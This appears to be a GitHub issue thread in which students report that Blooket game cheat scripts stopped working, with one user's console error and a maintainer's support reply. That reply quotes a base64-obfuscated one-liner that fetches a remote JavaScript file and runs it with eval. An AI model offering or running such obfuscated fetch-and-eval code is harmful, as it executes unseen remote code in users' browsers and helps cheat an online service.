### ISSUE TITLE
hacks not working

### ISSUE THREAD

**Issue by MYNAMEISUHIDK21** [glixzzy/blooket-hack#646]
the hacks are not working when i try and add coins or get all blooks. my device is chromebook i am not sure what it is.

**Comment by WhyJoseph** [comment]
omg they're not working

**Comment by diokitty** [comment]
VM100:1 GET https://school-cheats-1a4ee-default-rtdb.firebaseio.com/globalAddTokens.json 404 (Not Found)
when trying to add coins

**Comment by 3kh0** [comment]
**Hello there!**

Your issue is not complete and we can not tell the problem!<br>

Here are some questions you should answer when creating an issue:
- What browser do you use? 
- Are you on a school computer and/or connected to the school internet?
- Are you using a bookmarklet or are you pasting the code into the console?
- Has the code worked before?
- Is it the original code? This is what the original code would look like: `fetch(atob('aHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vc2Nob29sLWNoZWF0cy9yYXcvdXBsb2FkL3YxNjM3NDUyMjEzL2dsb2JhbFNwYW1PcGVuQm94ZXMuanM=')).then((res) => res.text().then((t) => eval(t)))`

Thank you for letting us know the issue! 😀

**Comment by varedz** [comment]
Updated code is on https://schoolcheats.net/blooket/ Firebase Database was deleted rendering the old scripts to be useless.
